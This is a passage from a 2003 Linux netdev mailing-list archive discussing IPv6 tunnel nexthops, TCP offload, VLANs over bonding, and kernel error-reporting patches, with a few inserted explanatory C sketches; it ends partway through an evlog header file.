Verification of validity of nexthop is to be done only when receiving nexthop through addrconf or redirect et al. I guess interior protocols also should take care of it. > 2) the kernel supports "must-resolve" next-hops. I do not know what it is. > practical situation is rather simple: for the case of a:b in 6to4, they're > always irrelevant. Sure. It is because use of a 6to4 address is meaningless in this context. That is the thought I am trying to deliver. > Note that nothing _prevents_ you from treating a:b in 2002:x:y::a:b I do not understand the rest. Listen, the tunnel needs an _IPv4_ address for the destination of the tunnel. Because our routing does not permit using a different address family as nexthop, we did a trick, presenting it as an IPv4-compat address. We could do this differently, f.e. use FFFF:EEEE:IPv4-addr:CCCC:DDDD with the same success, or any other randomly chosen encapsulation. And this silly combination is still _better_ than a 6to4 address, which contains redundant information, which can be mixed up with real _IPv6_ 6to4 addresses, and which contains the IPv4 address in a place which used to be the identification of a network prefix.
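To make the two encodings compared above concrete, here is a minimal user-space sketch. It is an illustration only, not code from the kernel or from this thread; the function names v4_from_compat() and v4_from_6to4() are made up for the example. It shows where the IPv4 address sits in an IPv4-compatible address (the last 32 bits, everything before them zero) versus a 6to4 address (bits 16..47, inside what would otherwise be the network prefix).

```c
#include <stdint.h>
#include <string.h>
#include <arpa/inet.h>
#include <netinet/in.h>

/* Hypothetical helper: IPv4-compatible address (::a.b.c.d).
 * The first 96 bits are zero and the IPv4 address occupies the last
 * 32 bits. Returns 1 and stores the IPv4 address (network byte order)
 * on success, 0 if the address does not have that form. */
static int v4_from_compat(const struct in6_addr *a6, struct in_addr *a4)
{
    static const uint8_t zero[12] = {0};
    uint32_t v4;

    if (memcmp(a6->s6_addr, zero, sizeof(zero)) != 0)
        return 0;
    memcpy(&v4, a6->s6_addr + 12, sizeof(v4));
    if (ntohl(v4) <= 1)     /* :: and ::1 are not IPv4-compatible */
        return 0;
    a4->s_addr = v4;
    return 1;
}

/* Hypothetical helper: 6to4 address (2002:AABB:CCDD::/48).
 * The IPv4 address AA.BB.CC.DD occupies bytes 2..5, i.e. it is part
 * of the prefix rather than of the interface identifier. */
static int v4_from_6to4(const struct in6_addr *a6, struct in_addr *a4)
{
    if (a6->s6_addr[0] != 0x20 || a6->s6_addr[1] != 0x02)
        return 0;
    memcpy(&a4->s_addr, a6->s6_addr + 2, 4);
    return 1;
}
```

For the IPv4 address 192.0.2.1, the IPv4-compatible form is ::192.0.2.1, while the corresponding 6to4 prefix is 2002:c000:0201::/48. Both helpers recover the same 32 bits, only from different positions in the 128-bit address.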
Alexey From kuznet@ms2.inr.ac.ru Tue Jul 15 07:47:11 2003 Received: with ECARTIS (v1.0.0; list netdev); Tue, 15 Jul 2003 07:47:19 -0700 (PDT) Received: from dub.inr.ac.ru (dub.inr.ac.ru [193.233.7.105]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6FEl9Fl018950 for ; Tue, 15 Jul 2003 07:47:10 -0700 Received: (from kuznet@localhost) by dub.inr.ac.ru (8.6.13/ANK) id SAA08540; Tue, 15 Jul 2003 18:46:57 +0400 From: kuznet@ms2.inr.ac.ru Message-Id: <200307151446.SAA08540@dub.inr.ac.ru> Subject: Re: 2.4.21+ - IPv6 over IPv4 tunneling b0rked To: pekkas@netcore.fi (Pekka Savola) Date: Tue, 15 Jul 2003 18:46:57 +0400 (MSD) Cc: davem@redhat.com, netdev@oss.sgi.com In-Reply-To: from "Pekka Savola" at Jul 15, 2003 09:14:07 X-Mailer: ELM [version 2.5 PL6] MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit X-archive-position: 4051 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: kuznet@ms2.inr.ac.ru Precedence: bulk X-list: netdev Hello! > "resolve" next-hops. I.e., the requirement that the users/protocols will > give you non-final nexthop information which you have to "resolve" to get > the final nexthop (e.g. a global address -> a link-local address > obtained using Neighbor Discovery). No way to resolve exists, unless it is already embedded in the corresponding protocol. F.e. a global address and its link-local equivalent could be transferred as attributes of BGP4+; the global address is used to validate the nexthop attribute and, as soon as it happens to be on-link, its link-local counterpart is used. If you have a global address out of context and want to use it as nexthop, you are in trouble. You have no way to get a unique router identifier, it is just not defined. So, you have to use the global one (and the kernel has to allow this), and surely will screw up the network, unless some policy constraints make the configuration legal.
Well, actually, we inevitably arrive at the conclusion that the whole idea of scoped addresses is just garbage, which results in nothing but inconveniences and innumerable inconsistencies. I remember some people predicted that it will be dropped by the start of real IPv6 deployment. Well, it is still not night. Alexey From dagriego@hotmail.com Tue Jul 15 09:28:16 2003 Received: with ECARTIS (v1.0.0; list netdev); Tue, 15 Jul 2003 09:28:23 -0700 (PDT) Received: from hotmail.com (sea2-f43.sea2.hotmail.com [207.68.165.43]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6FGSFFl028832 for ; Tue, 15 Jul 2003 09:28:16 -0700 Received: from mail pickup service by hotmail.com with Microsoft SMTPSVC; Tue, 15 Jul 2003 09:28:10 -0700 Received: from 143.182.124.2 by sea2fd.sea2.hotmail.msn.com with HTTP; Tue, 15 Jul 2003 16:28:10 GMT X-Originating-IP: [143.182.124.2] X-Originating-Email: [dagriego@hotmail.com] From: "David griego" To: davem@redhat.com, jros@xiran.com Cc: linux-kernel@vger.kernel.org, linux-net@vger.kernel.org, netdev@oss.sgi.com, alan@storlinksemi.com Subject: Re: TCP IP Offloading Interface Date: Tue, 15 Jul 2003 09:28:10 -0700 Mime-Version: 1.0 Content-Type: text/plain; format=flowed Message-ID: X-OriginalArrivalTime: 15 Jul 2003 16:28:10.0676 (UTC) FILETIME=[14B7AF40:01C34AEE] X-archive-position: 4052 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: dagriego@hotmail.com Precedence: bulk X-list: netdev Ok I've taken a look at your scheme and I have a few questions. >From: "David S. Miller" >You also ignore the points others have made that the systems HAVE >SCALED to evolving networks technologies as they have become faster >and faster. > This is not true in the embedded space. As I keep pointing out, typical embedded processors don't have as many free cycles as server computers.
> > >My RX receive page accumulation scheme handles all of the >receive side problems with touching the data and getting >into the filesystem and then the device. With my scheme >you can receive the data, go direct to the device, and the >cpu never touches one byte. > RDDP tries to get around needing a large amount of RAM on the NIC to collect all of this data before writing it to the OS memory. Also, the store-and-forward architecture you recommend adds latency in collecting all of this data before moving it to the OS. Finally, I recall some resistance to page flipping, which could also lead to walking page tables: more latency. Only after some extremely large amount of time has your received data made it to your application. Do you have a suggestion on how we could get around all of this store and forward without RDDP? Avoiding the CPU copy is not the only issue. > >I actually welcome Microsoft falling into this rathole of a >technology. Let them have to support that crap and have to field bug >reports on it, having to wonder who created the packets. And let them >deal with the negative effects TOE has on connection rates and things >like that. > Wouldn't it be a shame if they found a way around this "problem" you see and were successful, while Linux failed because you felt the community was not able to overcome these tough obstacles? > >Linux will be competitive, especially if people develop the scheme I >have described several times into the hardware. There are vendors >doing this, will you choose to be different and ignore this? Your ideas are good, but they leave in the store-and-forward issue that I mentioned. A good alternative would be one that kept things simple, as you suggested, but didn't introduce all of this latency.
From greearb@candelatech.com Tue Jul 15 10:25:08 2003 Received: with ECARTIS (v1.0.0; list netdev); Tue, 15 Jul 2003 10:25:23 -0700 (PDT) Received: from grok.yi.org (evrtwa1-ar2-4-33-045-074.evrtwa1.dsl-verizon.net [4.33.45.74]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6FHP7Fl030778 for ; Tue, 15 Jul 2003 10:25:08 -0700 Received: from candelatech.com (localhost.localdomain [127.0.0.1]) by grok.yi.org (8.12.8/8.12.8) with ESMTP id h6FHOnKk016609; Tue, 15 Jul 2003 10:24:49 -0700 Message-ID: <3F1438E1.5000600@candelatech.com> Date: Tue, 15 Jul 2003 10:24:49 -0700 From: Ben Greear Organization: Candela Technologies User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.4) Gecko/20030529 X-Accept-Language: en-us, en MIME-Version: 1.0 To: Shmulik Hen CC: bond-devel , linux-net , linux-netdev , "David S. Miller" , Jeff Garzik , Jay Vosburgh , Amir Noam , Noam Marom , Tsippy Mendelson Subject: Re: [RFC][bonding] Improve VLAN support on top of bonding References: In-Reply-To: Content-Type: text/plain; charset=us-ascii; format=flowed Content-Transfer-Encoding: 7bit X-archive-position: 4053 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: greearb@candelatech.com Precedence: bulk X-list: netdev Shmulik Hen wrote: > Hi All, > > Currently, when using 8021q VLAN module to work on top of bonding, > everything seems to work OK, but there are some issues that will not work > according to our analysis. For example, any self-generated packets sent by > bonding itself (e.g. arp-mon, TLB learning packets, ALB arp replies, etc.) > do not have the VLAN id tag in them, and thus will not go through the > switch. Also, in order to configure a VLAN interface, the underlying > interface must be configured first to IP address 0.0.0.0.
Since arp-mon > uses bond's IP address, this might cause further problems. Other issues > we have not yet investigated, such as what happens if bonding needs to parse > a tagged packet for layer2/layer3 data, might create still more problems. > > We have come up with some possible solutions that we would like to get > comments on. First of all, our main guideline was not to duplicate code > segments that are in the VLAN module and put them in bonding. Further, we > figured bonding should not need to know about how the VLAN module handles > hardware acceleration. On the other hand, bonding does need to know what > VLAN tags are being used so it may send packets successfully through all > the switch ports, so some kind of policy needs to be defined. > > So here is what we've come up with so far. > > 1. Configuration > Need to decide between: > a. Block VLAN add/del operations when bond has no slaves. > b. Block enslave/release of slaves when bond has no VLAN tags (needs a > module parameter). > c. Remove limitation of IP 0.0.0.0. > > 2. Indication > Need to decide between: > a. Add notification mechanism in VLAN module that bonding may register > to listen to, and thus keep track of VLAN tags added/removed. > b. Register to listen to net device register/unregister notifications > to monitor creation/destruction of VLAN devices. Requires support > for figuring out if a net device is a VLAN device, and also two vlan > calls like get_realdev() and get_vlan_id() exported. b) sounds good to me. There are flags that can let you know if it's a vlan device or not. if.h:#define IFF_802_1Q_VLAN 0x1 /* 802.1Q VLAN device. */ > c. Parse every packet going through bonding to collect VLAN tags. > > 3. Monitoring > In order for bonding to be able to generate tagged packets on its own, > two major changes need to be done. One is to split the vlan_start_xmit > function into insert_tag() and vlan_xmit(), so bonding may choose the > required tag on its own, and let 8021q do the transmit.
A second change > is to split arp_send() into arp_create() and arp_send(), so bonding may > pass all the usual parameters for arp creation, get a complete arp > packet and then pass it to 8021q for tag insertion on transmission. > > > Hardware acceleration > ===================== > When coming to analyze what is required for adding support for > VLAN hardware acceleration on top of bonding, other issues come to mind. > Since add/del operations are defined and handshakes are performed between > the VLAN module and the device driver, tracking VLAN tags is simpler and > commands should just be propagated to the slaves. Enslaving/releasing > slaves should also be simple and just require adding/removing existing > VLAN tags from them. The problem is how to handle configuration issues. I'd consider ignoring the HW accel unless you can prove it actually helps performance to a noticeable degree. I have never seen results of any benchmarking related to this... > > 1. Since adding the first VLAN tag requires some additional handshake, > can bonding support that operation on a bond that already has slaves > and is running? > 2. What about removing the last tag from a bond? > 3. Should the bond device declare itself as "VLAN challenged" before > registering and remove that limitation only once it has slaves? > 4. Should the bond declare itself as fully hardware acceleration capable > to benefit from "strong" slaves while performing regular VLAN > inserting/stripping for "weak" slaves? > 5. How can bonding generate untagged packets and send them via > hardware acceleration capable slaves (e.g. 802.3ad LACPDU) ? 
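As an illustration of the insert_tag() step proposed in the quoted text, here is a minimal user-space sketch of what inserting an 802.1Q tag into an untagged Ethernet frame involves. It is not the 8021q module's code: the function name insert_vlan_tag(), its parameters, and the flat byte-buffer interface are all hypothetical, chosen only to show the frame layout (4 tag bytes placed right after the two MAC addresses).

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>
#include <string.h>

#define ETH_ADDRS_LEN 12      /* destination MAC + source MAC */
#define VLAN_TAG_LEN  4       /* TPID (2 bytes) + TCI (2 bytes) */
#define VLAN_TPID     0x8100  /* 802.1Q tag protocol identifier */

/*
 * Hypothetical helper (not part of any kernel API): copy an untagged
 * Ethernet frame into out[], inserting an 802.1Q tag after the MAC
 * addresses. Returns the tagged length, or 0 if the frame is too short,
 * vid/prio are out of range, or out[] is too small.
 */
size_t insert_vlan_tag(const uint8_t *frame, size_t len,
                       uint16_t vid, uint8_t prio,
                       uint8_t *out, size_t outcap)
{
    uint16_t tci;

    assert(frame != NULL && out != NULL);

    /* Need both MAC addresses plus the 2-byte EtherType. */
    if (len < ETH_ADDRS_LEN + 2 || vid > 0x0fff || prio > 7)
        return 0;
    if (outcap < len + VLAN_TAG_LEN)
        return 0;

    /* TCI = priority (3 bits) | DEI/CFI (1 bit, left 0) | VLAN id (12 bits) */
    tci = (uint16_t)((prio << 13) | vid);

    memcpy(out, frame, ETH_ADDRS_LEN);
    out[12] = VLAN_TPID >> 8;           /* tag fields are big-endian */
    out[13] = VLAN_TPID & 0xff;
    out[14] = (uint8_t)(tci >> 8);
    out[15] = (uint8_t)(tci & 0xff);

    /* Original EtherType and payload follow the tag unchanged. */
    memcpy(out + ETH_ADDRS_LEN + VLAN_TAG_LEN,
           frame + ETH_ADDRS_LEN, len - ETH_ADDRS_LEN);
    return len + VLAN_TAG_LEN;
}
```

A caller that already has a complete untagged frame (for instance an ARP request built separately) would pass it through such a helper once per VLAN id it needs to probe; an in-kernel version would operate on an sk_buff instead of a flat buffer.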
> > -- Ben Greear President of Candela Technologies Inc http://www.candelatech.com ScryMUD: http://scry.wanfear.com http://scry.wanfear.com/~greear From pekkas@netcore.fi Tue Jul 15 10:29:27 2003 Received: with ECARTIS (v1.0.0; list netdev); Tue, 15 Jul 2003 10:29:32 -0700 (PDT) Received: from netcore.fi (netcore.fi [193.94.160.1]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6FHTPFl031170 for ; Tue, 15 Jul 2003 10:29:26 -0700 Received: from localhost (pekkas@localhost) by netcore.fi (8.11.6/8.11.6) with ESMTP id h6FHTBn14099; Tue, 15 Jul 2003 20:29:11 +0300 Date: Tue, 15 Jul 2003 20:29:11 +0300 (EEST) From: Pekka Savola To: kuznet@ms2.inr.ac.ru cc: davem@redhat.com, Subject: Re: 2.4.21+ - IPv6 over IPv4 tunneling b0rked In-Reply-To: <200307151446.SAA08540@dub.inr.ac.ru> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII X-archive-position: 4054 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: pekkas@netcore.fi Precedence: bulk X-list: netdev On Tue, 15 Jul 2003 kuznet@ms2.inr.ac.ru wrote: > > "resolve" next-hops. I.e., the requirement that the users/protocols will > > give you non-final nexthop information which you have to "resolve" to get > > the final nexthop (e.g. a global address -> a link-local address > > obtained using Neighbor Discovery). > > No way to resolve exists, unless it already embedded to corresponding > protocol. Assume you're a host on a link with prefix 3FFE:FFFF:A:B::/64. The router is the one with interface ID one. What happens when you do "ping6 3FFE:FFFF:A:B::1" ? Seems to resolve a link-local address for the router just fine. -- Pekka Savola "You each name yourselves king, yet the Netcore Oy kingdom bleeds." Systems. Networks. Security. -- George R.R. 
Martin: A Clash of Kings From jkenisto@us.ibm.com Tue Jul 15 10:46:08 2003 Received: with ECARTIS (v1.0.0; list netdev); Tue, 15 Jul 2003 10:46:15 -0700 (PDT) Received: from e4.ny.us.ibm.com (e4.ny.us.ibm.com [32.97.182.104]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6FHk5Fl031848 for ; Tue, 15 Jul 2003 10:46:08 -0700 Received: from northrelay02.pok.ibm.com (northrelay02.pok.ibm.com [9.56.224.150]) by e4.ny.us.ibm.com (8.12.9/8.12.2) with ESMTP id h6FHj4wO054952; Tue, 15 Jul 2003 13:45:04 -0400 Received: from us.ibm.com (d01av02.pok.ibm.com [9.56.224.216]) by northrelay02.pok.ibm.com (8.12.9/NCO/VER6.5) with ESMTP id h6FHj0cE139452; Tue, 15 Jul 2003 13:45:01 -0400 Message-ID: <3F143D0A.A052F0B6@us.ibm.com> Date: Tue, 15 Jul 2003 10:42:34 -0700 From: Jim Keniston X-Mailer: Mozilla 4.75 [en] (WinNT; U) X-Accept-Language: en MIME-Version: 1.0 To: James Morris CC: "David S. Miller" , linux-kernel@vger.kernel.org, netdev@oss.sgi.com, akpm@osdl.org, jgarzik@pobox.com, alan@lxorguk.ukuu.org.uk, rddunlap@osdl.org, kuznet@ms2.inr.ac.ru, jkenisto@us.ibm.com Subject: [PATCH] [1/2] kernel error reporting (revised) References: Content-Type: multipart/mixed; boundary="------------0BE7F200693D6C2244226BA0" X-archive-position: 4055 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: jkenisto@us.ibm.com Precedence: bulk X-list: netdev This is a multi-part message in MIME format. 
--------------0BE7F200693D6C2244226BA0 Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Jim Keniston wrote: > Subject: [PATCH - RFC] [1/2] 2.6 must-fix list - kernel error reporting > > Andrew Morton's 2.6 must-fix list includes the following item: > > o We need a kernel side API for reporting error events to userspace (could > > be async to 2.6 itself) > > > > (Prototype core based on netlink exists) > > The enclosed patches provide a mechanism for reporting error events > to user-mode applications via netlink. This mechanism supplements > the text-oriented printk mechanism, providing a way to log binary > data or a mixture of text+binary. > ... > Here are updated patches, reflecting the following changes: Patch #1 (kerror.c et al): - Given James Morris's patch to af_netlink.c (Rev 1.30 in BitKeeper), I was able to remove kerror_netlink_rcv(). (My patches work fine without this, except that any packets sent to the NETLINK_KERROR socket by an ill-behaved, root-owned application would accumulate in the kernel's socket buffer.) Patch #2 (evlog.c et al -- see accompanying post): - Paraphrase dropped packets via printk() when nobody's listening to netlink socket. - Added support for 'z' qualifier, to resync with vsnprintf(). - In evlog.h, reordered members of struct kern_log_entry to address alignment worries. These patches work for both 2.5.74 and 2.5.75. 
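To make the alignment point about struct kern_log_entry concrete, here is a minimal user-space sketch of how a consumer might mirror the record header and sanity-check a received payload. The constants are taken from evlog.h in the accompanying patch; everything else is an assumption: the names evl_hdr_mirror, evl_hdr_padding() and evl_check_record() are hypothetical, uid_t, gid_t and pid_t are taken to be 32 bits wide, and buf is assumed to point at the netlink message payload (after the nlmsghdr).

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>
#include <string.h>

#define LOGREC_KMAGIC    0x7af8       /* from evlog.h in the patch */
#define LOGREC_KVERSION  3            /* from evlog.h in the patch */
#define EVL_ENTRY_MAXLEN (8 * 1024)   /* from evlog.h in the patch */
#define FACILITY_MAXLEN  16           /* from evlog.h in the patch */

/*
 * Hypothetical user-space mirror of struct kern_log_entry.
 * Assumption: uid_t, gid_t and pid_t are 32 bits wide.
 * Members are ordered so that each one is naturally aligned:
 * 2+2+2+1+1 = 8 bytes, then seven 4-byte fields, then 16 chars.
 */
struct evl_hdr_mirror {
    uint16_t log_kmagic;
    uint16_t log_kversion;
    uint16_t log_size;       /* bytes of variable data after the header */
    int8_t   log_format;
    int8_t   log_severity;
    int32_t  log_event_type;
    uint32_t log_flags;
    int32_t  log_processor;
    uint32_t log_uid;
    uint32_t log_gid;
    int32_t  log_pid;
    int32_t  log_pgrp;
    char     log_facility[FACILITY_MAXLEN];
};

/* Number of padding bytes the compiler added (0 with the ordering above). */
size_t evl_hdr_padding(void)
{
    return sizeof(struct evl_hdr_mirror) - (8 + 7 * 4 + FACILITY_MAXLEN);
}

/*
 * Copy the header out of buf and check it.
 * Returns 0 if buf holds a plausible record, -1 otherwise.
 */
int evl_check_record(const void *buf, size_t len, struct evl_hdr_mirror *hdr)
{
    assert(buf != NULL && hdr != NULL);

    if (len < sizeof(*hdr))
        return -1;
    memcpy(hdr, buf, sizeof(*hdr));   /* buf may not be suitably aligned */

    if (hdr->log_kmagic != LOGREC_KMAGIC ||
        hdr->log_kversion != LOGREC_KVERSION)
        return -1;
    if (hdr->log_size > EVL_ENTRY_MAXLEN ||
        len - sizeof(*hdr) < hdr->log_size)
        return -1;
    return 0;
}
```

A reader of the NETLINK_KERROR socket would call evl_check_record() on each message payload before interpreting the variable part according to log_format. The sketch assumes sender and receiver share byte order and ABI, which holds for a daemon running on the same machine as the kernel.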
Jim Keniston IBM Linux Technology Center http://prdownloads.sourceforge.net/evlog/kerror-2.5.75.patch?download http://prdownloads.sourceforge.net/evlog/evlog-2.5.75.patch?download http://prdownloads.sourceforge.net/evlog/kerrord.tar.gz?download --------------0BE7F200693D6C2244226BA0 Content-Type: text/plain; charset=us-ascii; name="kerror-2.5.75.patch" Content-Transfer-Encoding: 7bit Content-Disposition: inline; filename="kerror-2.5.75.patch" diff -Naur linux.org/include/linux/kerror.h linux.kerror.patched/include/linux/kerror.h --- linux.org/include/linux/kerror.h Wed Dec 31 16:00:00 1969 +++ linux.kerror.patched/include/linux/kerror.h Mon Jul 14 09:53:00 2003 @@ -0,0 +1,27 @@ +#ifndef _KERROR_H +#define _KERROR_H + +#ifdef __KERNEL__ +#include +#include +#include + +#ifdef CONFIG_NET +extern int kernel_error_event(void *data, size_t len, __u32 groups); +extern int kernel_error_event_iov(const struct iovec *iov, + unsigned int nseg, __u32 groups); +#else +static inline int kernel_error_event(void *data, size_t len, __u32 groups) + { return -ENOSYS; } +static inline int kernel_error_event_iov(const struct iovec *iov, + unsigned int nseg, __u32 groups) + { return -ENOSYS; } +#endif /* CONFIG_NET */ +#endif /* __KERNEL__ */ + +#define KERROR_GROUP_RAW 0x00000001 +#define KERROR_GROUP_EVLOG 0x00000002 + +#define KERROR_GROUP_ALL (~(u32)0) + +#endif /* _KERROR_H */ diff -Naur linux.org/include/linux/netlink.h linux.kerror.patched/include/linux/netlink.h --- linux.org/include/linux/netlink.h Mon Jul 14 09:53:00 2003 +++ linux.kerror.patched/include/linux/netlink.h Mon Jul 14 09:53:00 2003 @@ -10,6 +10,7 @@ #define NETLINK_TCPDIAG 4 /* TCP socket monitoring */ #define NETLINK_NFLOG 5 /* netfilter/iptables ULOG */ #define NETLINK_XFRM 6 /* ipsec */ +#define NETLINK_KERROR 7 /* kernel error event facility */ #define NETLINK_ARPD 8 #define NETLINK_ROUTE6 11 /* af_inet6 route comm channel */ #define NETLINK_IP6_FW 13 diff -Naur linux.org/net/netlink/Makefile 
linux.kerror.patched/net/netlink/Makefile --- linux.org/net/netlink/Makefile Mon Jul 14 09:53:00 2003 +++ linux.kerror.patched/net/netlink/Makefile Mon Jul 14 09:53:00 2003 @@ -2,5 +2,5 @@ # Makefile for the netlink driver. # -obj-y := af_netlink.o +obj-y := af_netlink.o kerror.o obj-$(CONFIG_NETLINK_DEV) += netlink_dev.o diff -Naur linux.org/net/netlink/kerror.c linux.kerror.patched/net/netlink/kerror.c --- linux.org/net/netlink/kerror.c Wed Dec 31 16:00:00 1969 +++ linux.kerror.patched/net/netlink/kerror.c Mon Jul 14 09:53:00 2003 @@ -0,0 +1,97 @@ +/* kerror.c: Kernel error event logging facility. + * + * Copyright (C) 2003 David S. Miller (davem@redhat.com) + * June 2003 - Jim Keniston and Dan Stekloff (kenistoj and dsteklof@us.ibm.com) + * Fixed a couple of bugs and added iovec interface. + */ + +#include +#include +#include +#include +#include +#include +#include +#include +#include + +static struct sock *kerror_nl; + +/** + * kernel_error_event_iov() - Broadcast packet to NETLINK_KERROR sockets. 
+ * @iov: the packet's data + * @nseg: number of segments in iov[] + * @groups: as with kernel_error_event() + */ +int kernel_error_event_iov(const struct iovec *iov, unsigned int nseg, + u32 groups) +{ + struct sk_buff *skb; + struct nlmsghdr *nlh; + unsigned char *b, *p; + size_t len; + unsigned int seg; + + if (!groups) + return -EINVAL; + + len = iov_length(iov, nseg); + skb = alloc_skb(NLMSG_SPACE(len), GFP_ATOMIC); + if (skb == NULL) + return -ENOMEM; + + b = skb->tail; + + nlh = NLMSG_PUT(skb, current->pid, 0, 0, len); + nlh->nlmsg_flags = 0; + + p = NLMSG_DATA(nlh); + for (seg = 0; seg < nseg; seg++) { + memcpy(p, (const void*)iov[seg].iov_base, iov[seg].iov_len); + p += iov[seg].iov_len; + } + nlh->nlmsg_len = skb->tail - b; + + NETLINK_CB(skb).dst_groups = groups; + + return netlink_broadcast(kerror_nl, skb, 0, ~0, GFP_ATOMIC); + +nlmsg_failure: + kfree_skb(skb); + return -EINVAL; +} + +/** + * kernel_error_event() - Broadcast packet to NETLINK_KERROR sockets. + * @data, @len: the packet's data + * @groups: the group(s) to which the packet pertains -- e.g., + * KERROR_GROUP_EVLOG. On a recvmsg(), this shows up in + * ((struct sockaddr_nl*)(msg->msg_name))->nl_groups. + */ +int kernel_error_event(void *data, size_t len, u32 groups) +{ + struct iovec iov; + iov.iov_base = data; + iov.iov_len = len; + return kernel_error_event_iov(&iov, 1, groups); +} + +static int __init kerror_init(void) +{ + printk(KERN_INFO "Initializing KERROR netlink socket\n"); + + /* Note that we ignore all incoming messages on this socket. 
*/ + kerror_nl = netlink_kernel_create(NETLINK_KERROR, NULL); + if (kerror_nl == NULL) + panic("kerror_init: cannot initialize kerror_nl\n"); + + return 0; +} + +static void __exit kerror_exit(void) +{ + sock_release(kerror_nl->sk_socket); +} + +module_init(kerror_init); +module_exit(kerror_exit); diff -Naur linux.org/net/netsyms.c linux.kerror.patched/net/netsyms.c --- linux.org/net/netsyms.c Mon Jul 14 09:53:00 2003 +++ linux.kerror.patched/net/netsyms.c Mon Jul 14 09:53:00 2003 @@ -83,6 +83,7 @@ #endif #include +#include #ifdef CONFIG_IPX_MODULE extern struct datalink_proto *make_EII_client(void); @@ -505,6 +506,8 @@ EXPORT_SYMBOL(netlink_set_nonroot); EXPORT_SYMBOL(netlink_register_notifier); EXPORT_SYMBOL(netlink_unregister_notifier); +EXPORT_SYMBOL(kernel_error_event); +EXPORT_SYMBOL(kernel_error_event_iov); #if defined(CONFIG_NETLINK_DEV) || defined(CONFIG_NETLINK_DEV_MODULE) EXPORT_SYMBOL(netlink_attach); EXPORT_SYMBOL(netlink_detach); --------------0BE7F200693D6C2244226BA0-- From jkenisto@us.ibm.com Tue Jul 15 10:49:22 2003 Received: with ECARTIS (v1.0.0; list netdev); Tue, 15 Jul 2003 10:49:30 -0700 (PDT) Received: from e1.ny.us.ibm.com (e1.ny.us.ibm.com [32.97.182.101]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6FHnLFl032209 for ; Tue, 15 Jul 2003 10:49:22 -0700 Received: from northrelay04.pok.ibm.com (northrelay04.pok.ibm.com [9.56.224.206]) by e1.ny.us.ibm.com (8.12.9/8.12.2) with ESMTP id h6FHmKKb223844; Tue, 15 Jul 2003 13:48:20 -0400 Received: from us.ibm.com (d01av02.pok.ibm.com [9.56.224.216]) by northrelay04.pok.ibm.com (8.12.9/NCO/VER6.5) with ESMTP id h6FHmDrU076526; Tue, 15 Jul 2003 13:48:14 -0400 Message-ID: <3F143DCA.8369CDE6@us.ibm.com> Date: Tue, 15 Jul 2003 10:45:46 -0700 From: Jim Keniston X-Mailer: Mozilla 4.75 [en] (WinNT; U) X-Accept-Language: en MIME-Version: 1.0 To: James Morris , "David S. 
Miller" , linux-kernel@vger.kernel.org, netdev@oss.sgi.com, akpm@osdl.org, jgarzik@pobox.com, alan@lxorguk.ukuu.org.uk, rddunlap@osdl.org, kuznet@ms2.inr.ac.ru, jkenisto@us.ibm.com Subject: Re: [PATCH] [2/2] kernel error reporting (revised) References: <3F143D0A.A052F0B6@us.ibm.com> Content-Type: multipart/mixed; boundary="------------C7D4C0502BFD8844E4AD4ADE" X-archive-position: 4056 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: jkenisto@us.ibm.com Precedence: bulk X-list: netdev This is a multi-part message in MIME format. --------------C7D4C0502BFD8844E4AD4ADE Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit This patch is described in the previous post. Jim Keniston IBM Linux Technology Center --------------C7D4C0502BFD8844E4AD4ADE Content-Type: text/plain; charset=us-ascii; name="evlog-2.5.75.patch" Content-Transfer-Encoding: 7bit Content-Disposition: inline; filename="evlog-2.5.75.patch" diff -Naur linux.org/include/linux/evlog.h linux.evlog.patched/include/linux/evlog.h --- linux.org/include/linux/evlog.h Wed Dec 31 16:00:00 1969 +++ linux.evlog.patched/include/linux/evlog.h Mon Jul 14 09:52:59 2003 @@ -0,0 +1,109 @@ +/* + * Linux Event Logging + * Copyright (c) International Business Machines Corp., 2001 + * + * This program is free software; you can redistribute it and/or modify + * it under the terms of the GNU General Public License as published by + * the Free Software Foundation; either version 2 of the License, or + * (at your option) any later version. + * + * This program is distributed in the hope that it will be useful, + * but WITHOUT ANY WARRANTY; without even the implied warranty of + * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the + * GNU General Public License for more details. 
+ * + * You should have received a copy of the GNU General Public License + * along with this program; if not, write to the Free Software + * Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA. + * + * Please send e-mail to kenistoj@users.sourceforge.net if you have + * questions or comments. + * + * Project Website: http://evlog.sourceforge.net/ + */ + +#ifndef _LINUX_EVLOG_H +#define _LINUX_EVLOG_H + +#include +#include +#include + +/* Values for log_flags member */ +#define EVL_TRUNCATE 0x1 +#define EVL_KERNEL_EVENT 0x2 +#define EVL_INTERRUPT 0x10 /* Logged from interrupt context */ +#define EVL_PRINTK 0x20 /* Strip leading when formatting */ +#define EVL_EVTYCRC 0x40 /* Daemon will set event type = CRC */ + /* of format string. */ + +/* Formats for optional portion of record. */ +#define EVL_NODATA 0 +#define EVL_BINARY 1 +#define EVL_STRING 2 +#define EVL_PRINTF 3 + +/* Maximum length of variable portion of record */ +#define EVL_ENTRY_MAXLEN (8 * 1024) + +/* Facility (e.g., driver) names are truncated 